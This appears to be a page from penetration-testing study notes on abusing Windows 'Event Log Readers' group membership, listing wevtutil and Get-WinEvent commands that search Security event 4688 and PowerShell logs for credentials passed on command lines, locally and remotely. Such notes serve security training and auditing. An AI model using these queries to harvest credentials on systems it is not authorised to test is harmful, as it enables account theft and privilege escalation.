Exploiting Event Log Readers Group for Security Log Access

Verify Group Membership:

net localgroup "Event Log Readers"

Check if the user is a member of the "Event Log Readers" group.

Identify Audit Settings:

Determine if process creation auditing (Event ID 4688) and command-line logging are enabled.

Query Security Logs using wevtutil:

wevtutil qe Security /rd:true /f:text | Select-String "/user"

Search for credential usage in the security logs.

wevtutil qe Security /rd:true /f:text /r:<remote_host> /u:<user> /p:<password> | findstr "/user"

Remotely query security logs with credentials.

Query Security Logs using Get-WinEvent:

Get-WinEvent -LogName security | Where-Object { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}

Search for credential usage in process creation events.

Get-WinEvent -LogName security -Credential <PSCredential> | Where-Object { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}

Remote query using specific credentials.

Explore PowerShell Operational Logs:

Examine the PowerShell Operational log for sensitive information if script block or module logging is enabled.

Commands:

  • net localgroup "Event Log Readers"

  • wevtutil qe Security

  • findstr

PowerShell Cmdlets:

  • Get-WinEvent

  • Select-String

  • Where-Object

Techniques:

  • Leverage "Event Log Readers" group membership to access security logs.

  • Search for sensitive information (credentials, command-line parameters) within event logs.

  • Use wevtutil and Get-WinEvent to query and filter event log data.

  • Explore PowerShell Operational logs for potential credential leaks.

  • Understand the importance of process creation auditing and command-line logging.

Previous8.Windows-built-in-groupsNext4.Attacking the OS

Last updated